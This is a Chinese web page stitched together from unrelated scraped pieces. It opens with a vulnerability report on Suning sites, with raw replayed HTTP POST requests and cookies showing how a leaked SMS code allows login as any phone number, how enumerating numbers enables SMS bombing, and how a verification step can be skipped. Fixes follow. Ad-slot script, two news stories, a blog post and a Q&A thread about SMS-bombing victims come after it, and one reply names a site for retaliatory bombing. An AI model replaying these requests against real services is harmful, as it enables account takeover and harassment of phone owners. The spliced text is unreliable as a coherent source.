苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的漏洞及解决方案
苏宁易购某网站全网号码存在任意登录、短信轰炸、绕过验证码的
正常登录易购，打开我的互联界面，选择登录模式为短信验证码，获取验证码。
/mysnnet/login.htm
手机号码不是本人，点了验证码也没有用啊。没关系，我们重放一下发送验证码的post请求
POST /myauth/checkMobile.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/ Firefox/18.0
Accept: */*
Accept-Language: zh-cn,q=0.8,en-q=0.5,q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form- charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: /mysnnet/login.htm
Content-Length: 21
Cookie: WC_PERSISTENT=eRWA662%2bcQv%2bqzAZapSgr8SlGSc%3d%0a%3b%2d11+10%3a00%3a58%2e8%5f7%2d457%5f10052; _snma=1%7CC7%7C1%7C1%7C64%7C4; idsLoginUserIdLastTime=**********; WC_SERVER=6; totalProdQty=2; SN_CITY=100_100_3_65_2_0; cityId=9173; districtId=11365; _device_session_id=p_c7d*******32b06abc5e5; WC_SESSION_ESTABLISHED= WC_ACTIVEPOINTER=%2d7%2c10052; cartv20=6*****=******** custno=; WC_ML=L2; WC_RF=H; Login_UserName=+++++++g. _snmp=991770; _snmc=1; _snsr=direct%7Cdirect%7C%7C%7C; _snmb=C6%7C3%7C52; webcall_last_id=; nick=%E5%*******%BF%80%E6%B5%AA...; logonStatus=2; authId=siD152F274DE8; SN_CLIENT_ID=c347f1b18d614df1aa3f6c; WC_USERACTIVITY_30000*******l%0ah3Dj5Lc2vnh33WrJoOE3zKQpMppCLQ%3d%3d; _snmz=C%%29
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
newMobile=1709258xxxx
以下为重放post请求的具体截图，可以看见返回值里面的smcCode已经提前显示出来了，正常逻辑是显示在手机短信里面的。
接下来就是遍历用户登录了，各种查询，业务办理
另外再提一下，进入用户的界面后，服务密码修改这块，对原密码的输入错误次数没有任何限制，用被暴力的后果，
另外1个漏洞，苏宁易购广告联盟
验证当前用户身份存在绕过验证码策略，对手机进行短信轰炸。
/aas/myinfo/network/my-info-manager!updatePromobile.action?step=1
抓取验证身份-获取短信验证码数据包
POST /aas/myinfo/network/my-info-manager!sendCode.action HTTP/1.1
User-Agent: Mozilla/5.0 (iP U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: */*
Accept-Language: zh-cn,q=0.8,en-q=0.5,q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form- charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: /aas/myinfo/network/my-info-manager!updatePromobile.action?step=1
Content-Length: 28
Cookie: WC_PERSISTENT=raODDuFWOIUODRfaWwog%2fxQ5QIM%3d%0a%3b%2d25+10%3a51%3a26%2e914%5f7%2d457%5f10052;
proMobile=186XXXXXX&type=u
通过HTTP协议重放攻击，设置proMobile手机号码字段值的范围，可遍历所有手机号码进行短信轰炸。
绕过验证码
正常页面处理逻辑为1，验证身份（输入验证码）-2、修改手机（输入验证码）-3、修改成功。
再次修改手机时可以直接绕过验证身份（输入验证码）链接
/aas/myinfo/network/my-info-manager!updatePromobile.action?step=1
复制输入修改新手机186xxxx94xx（输入验证码）链接，即可直接修改新手机并绑定成功。
/aas/myinfo/network/my-info-manager!updatePromobile.action?step=2
/aas/myinfo/network/my-info-manager!updatePromobile.action?step=3
解决方案：
1、不将短信验证码显示在http返回值里面
2、服务密码这块加入输入错误次数的限制，防止暴力破解
3、，时间戳，每个包要有包序号，每次同向加1，收到重复序号认为是攻击，可以抵御重放攻击。
4、验证更换手机密码步骤之间的关联和有效性。
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'贵阳一市民遭短信轰炸 一小时内收到130多条_本地社会_贵阳网
&&&&&&>&&&&&正文
贵阳一市民遭短信轰炸 一小时内收到130多条
来源：贵阳网-贵阳晚报&&
摘要：&昨日，贵阳市民小聪遭遇短信轰炸，手机在一个多小时内接连收到130多条来自网站、银行、游戏和电信运营商的服务验证码短信。相关人士称，这可能是一款名为“短信轰炸机”的骚扰软件在作祟。
昨日，贵阳市民小聪遭遇短信轰炸，手机在一个多小时内接连收到130多条来自网站、银行、游戏和电信运营商的服务验证码短信。相关人士称，这可能是一款名为“短信轰炸机”的骚扰软件在作祟。
“您正在进行账户验证，请输入验证码……”从昨日10时40分开始，小聪的手机上就接连收到这样的“验证”或“激活”短信。“短信轰炸”一直持续至12时许，累计收到短信130多条，短信内容包括各种各样的购物网站、游戏业务，也不乏信用卡支付的验证信息，手机电量从90%迅速下降至60%，让小聪颇感“崩溃”。
小聪立即联系通信运营商的客服电话，对方答复称“无法屏蔽类似短信”，建议她下载相关软件进行拦截。为了安全起见，小聪还将手机上绑定的微信支付等业务进行了解除。
随后，记者向手机专卖店咨询得知，这位市民的遭遇应该是“短信轰炸机”所为。“短信轰炸机”属于一种骚扰软件，有人故意报复，向该手机号发送短信，只要在指定位置输入手机号，设定好“轰炸时间”，软件就会向指定手机发送上百条短信。短信号码多为正规商家广告短信发送号，内容则是网站的注册或验证码信息。当对方点击“停止轰炸”后，手机才会停止接收短信。
对此，该手机店工作人员建议，为了防止类似事件的发生，市民要提高电话号码的保密意识，尽量不要向陌生人透露自己的个人信息。
（本报记者 黄启旺）
责任编辑：刘鹏
从最新的天气预报来看，端午节期间，全省将自西北向东南 ...随着高考的结束，端午假期来临，尽然高速不免费，但丝毫 ...贵阳孔学堂在端午小长假期间将开展多个传统文化活动，包 ...高考结束后,我省语文、数学、外语、文综、理综五大高考学...(记者　张元斌)端午节前夕,为加强节日传统食品安全监管, ...
根据暴风科技与这三家公司的协议，当时的业绩承诺是比较 ...泰国明星Lalana Kongtoranin，2006年选美皇后冠军，2012 ...《魔兽》于6月8日零点在中国内地上映。在此之前，内地首 ...王凯丽和邓忠才刚澄清没多久，立刻就又被网友公开一张舌 ...近日有网友发现中国南方航空一名空少，竟跟韩国男神宋仲 ...
8日宣布，俄罗斯网球运动员莎拉波娃因服用违禁药物被禁赛...谈到同智利的小组赛首战时，马蒂诺表示，“不同于以往同 ...在大连进行的一场热身赛中，中国队迎战哈萨克斯坦队。虽 ...没有意外！林书豪选择跳出合同，试水自由市场，今夏他将 ...从国际排联公布的小组赛赛程看，中国队将在8月6日北京时 ...
冰蓝色单品街拍合辑　　夏季持续的高温让人容易心烦气躁 ...无论是拼色设计，还是运用火热的动物纹、植物色系，都可 ...身为超模，好衣品自然没得说，看今天这身Baroque风情的蓬...亿万富豪的女儿、Trump集团的执行副总裁、珠宝设计师、名...在经历2015年秋冬奶油般的甜美、2016春夏炽热浓烈之后， ...
大数据是对于大规模现象的一种模糊的表达。这一术语如今已经被企业家、科学家、政府和媒体炒得过热。[]
这个端午节，哪里更好玩？端午小长假启动，省旅游发展委员会昨日向社会推荐省内各地端午节丰富多彩的民俗活动，以及免票或优 ...[]一位程序猿的个人博客
再次被人用短信轰炸了
第一次是给别人垫钱买了机票，然后钱一直不想还，最后我报警了，别人迫于压力还钱了，但随后就收到了一百多条短信了，最后还是在对方朋友圈的截图发现证据，证明是他发的，然后报警，此事才有了了结。然后就是上次在淘宝买了个手机壳子，质量非常差，是金属的，全黑的，收到的时候油漆已经掉得很厉害了，而且接口处还不平，买了下卖家，让我退货，39元的东西，运费要我承担30，那还有什么好退的，结果就丢了算了，直接给了个差评，评价一给完，马上一个电话打来，说是让我下次不要在他那里买东西了，我直接回了句，放心，免费的我也不要了。电话挂了两分钟左右，短信开始来了，都是各种银行、淘宝、京东各种验证码，我知道肯定是这人用了网上所谓的短信轰炸机，随后淘宝上投诉了（投诉内容）：我一评价之后，他用电话打给我，我说明产品问题后，他就语气不好的说，以后不要在他店里买东西，然后挂了电话，随后收到了几十条垃圾短信。到第三天了，短信还在发，无奈打了联通10018，客服也是很奇怪为什么有这么多的垃圾短信，然后说转到技术部门24小时内会答复我。第二天10点多，联通一位男客服打电话我，直接就问我是不是在用邮政、京东....之类的服务，建议我打对应的客服，我很明确告诉他，我没有用这些，即使有用，正常人想一下也知道，验证码有可能一小时发一百多条吗，那不是我没事都在那点发验证码了。直接就告诉客服，我得罪别人了，那短信是通过一种叫做“短信轰炸机”的东西发的，看联通有没有什么解决方法，能不能屏蔽什么的，随后联通客服才告诉我，屏蔽的话就屏蔽所有的了，包括银行、淘宝什么的，短信都收不到，这样当然是不行。最后才提议让我使用软件屏蔽，下载了个防火墙软件，终于清静了。那么，肯定有人会问，短信轰炸机的原理又是什么呢？为什么可以做到轰炸呢？其实，原理很简单，就是利用程序，将你的号码循环的提交到一些注册重置的页面，就是一般我们在使用银行、一些网络平台时，系统所发的验证码。
分享文章：再次被人用短信轰炸了
您可能还喜欢这些：
武汉理工大学
一位程序猿的个人博客
历史上的今天没有发布任何内容。
这些年，双方的联系方式都发生了变化，唯一可以联系的只有我当年给她的QQ，反复打开了几遍QQ邮箱，不知道写些什么好，也许我不应该打破现在平静的生活。“生日快乐，未来的路好好把握，希望你幸福快乐！”
相信有很多网友和我一样疑惑路由器、光猫24小时开机耗电吗，购买了一个检测器，对常用的路由器、光猫、充电器进行了耗电量测试，经过测试我们可以清楚了解路由器、光猫、充电器每天、每月、每年的耗电量，从而决定是否关机。
今天，意外地被人撞了下，第一是反应脚很痛，因为那人是从后面过来的，我完全没有任何防备的情况下撞到我的，当时路上好多人，正好是下班高峰，也真是不走运，刚好撞到了我。
PHP程序员雷雪松手机号泄露，收到各类网站的验证码短信该怎么办？
因为自己疏忽，在SMZDM下面的留言栏里随意留下了手机号码，导致号码被不法分子所知晓，在各个网站（优酷、飞信、58同城等）进行注册，尔后手机就收到优酷等网站发来的各类不同的验证码短信20条左右。请问，遇到这种情况该如何解决？既然他们无法收到验证码短信，进行该操作的目的何在？-------------------------------------------------------------更新因为一起在留言栏里留了电话的人中也有人遇到了跟我一样的情况，加上平时的为人处事等条件分析，恶意报复、作弄这些动机基本可以排除，因为除了第一次碰到这种情况造成的紧张与不安，起不到作弄和报复的作用，因此我更倾向于“他”确实是在用我们留下的手机号进行注册，所以才有了以上的发问。当然也不排除“他”是随便用这些号码在试验短信轰炸器好不好用。。。。同事甚至还说，现在有一种短信拦截器，能够窃取我短信的信息，实际上我的验证码对方已经知道了。我倾向于不相信，这样的话，岂不是随便一个人的手机号都可以拿来使用了？不知我这想法对不对。心里仍有疑惑，但谢谢目前已经回答了问题的各位。情况：求救求救，登陆优酷绑定手机，但到现在也没有一条验证码短信发到我手机上，这是要“中奖”的节奏了？输入同事的手机号，他不久就收到了验证码短信，今早再试，仍旧没有发过来。号码被窃取的可能性有点大了似乎------------------------------------------------------------------------------11月14日更新：提心吊胆地过了风平浪静的日子，去营业厅换了张卡，目前为止没有让人不安的消息。优酷说给答复但至今没答复。
按投票排序
据我的经验 你是被短信轰炸器轰炸了.....
很简单，你自己去都注册一遍！看谁还能再用你的手机号注册。
三条路。1.换卡号2.找运营商客服协商解决。3.下个大家天天都在黑的360出品的短信过滤软件。
没用。是有人骚扰你。开启带有白名单的防火墙软件即可，屏蔽一切陌生号码的短信，如果是安卓平台的软件，这类软件如过江之鲫，甚至包括塞班时代就臭名昭著的 网秦 。苹果iOS平台也有不少，不过都要越狱之后才可以使用。
使用手机安全软件屏蔽。这些短信有很多是来自同一个号码。--我也有这个轰炸软件。
只有忍了。。。在不就换卡，我现在平均每天至少接到一个推销电话，什么都有，推销基金、黄金、期货、白银、房子、车子。最可耻的是我一大老爷们经常收到沃尔玛发给我的短信：亲爱的妈妈，您的宝宝已经2岁了。。。我去。。只要能想到的都有。。。我都不知道我的手机号怎么泄露的。。。
我也收到了，没有得罪过人是不是中病毒了
只是收到验证码这种情况，90%的可能性，是被短信轰炸机轰炸了，又80%的可能性，是哪个坑爹的朋友捉弄你，基本放心，没啥其他危害
今天我也遇见了相同的情况，我觉得可能是淘宝卖家做的，我想问问有没有什么方法能治这种人
zhasini.ml发现是谁炸你的，炸回去
已有帐号？
无法登录？
社交帐号登录女子遭遇“短信轰炸”一小时狂收250条垃圾短信
近日，福州市民檀小姐在拒接一个陌生来电后，便遭遇了数百条&短信轰炸&。针对这种情况，专家建议用户安装360手机卫士等安全软件，此类软件可以对陌生号码进行精准识别和拦截。
一小时狂收250条垃圾短信
前几天，市民檀小姐在拒接了一个号码为010-的陌生电话后，就不断接连收到各个网站发来的&注册验证码&的短信，一个小时就收到250条垃圾短信，而这些网站檀小姐从未登录过。忍受不了短信轰炸，檀小姐向移动公司投诉，客服建议檀小姐报警，并帮其暂时关闭了短信接收功能。
随后檀小姐从网上了解到，自己的情况是受到了一款名为&短信轰炸机&软件的骚扰。记者调查发现，该软件在一些网站上可以轻易下载，在软件内输入指定手机号，设定好&轰炸时间&，软件就会向该号码发送上百条短信，所发送的短信号码大多是106开头，包括苏宁易购、乐蜂网、世纪佳缘等各大网站的注册或验证码信息。而要停止发送短信，需要在软件上点击&停止轰炸&。
建议：可安装防骚扰软件
近年来，随着手机成为日常生活里的必备工具，手机带来的垃圾短信等&骚扰&也愈演愈烈。据工业和信息化部日前公布的数据显示，二季度受理有效垃圾短信举报34731件次，较一季度上升26.7%。其中&点对点&垃圾短信有效举报共31110件次，较一季度上升33.3%。
垃圾短信防不慎防，令人困扰。记者了解到，其实目前一些手机安全软件对于各种垃圾短信都有很完善的防范措施。比如360手机卫士通过智能云来快速识别陌生来电，并通过其云标记功能，对陌生来电及时标记。在手机用户开启360手机卫士的骚扰拦截服务后，就可以设置对垃圾短信及骚扰电话的及时拦截。
同时，业内专家指出，遭遇&短信轰炸&很有可能是个人信息遭到泄露，市民必须在日常工作、生活中提高隐私保护意识，保护好个人隐私，不给犯罪分子留有作恶的机会。
看过本文的人还看过
最新图文推荐
大家感兴趣的内容
&&<a rel="nofollow" class="red" href="" target="_blank" color="red新版网站排行榜
===全新上线===
网友热评的文章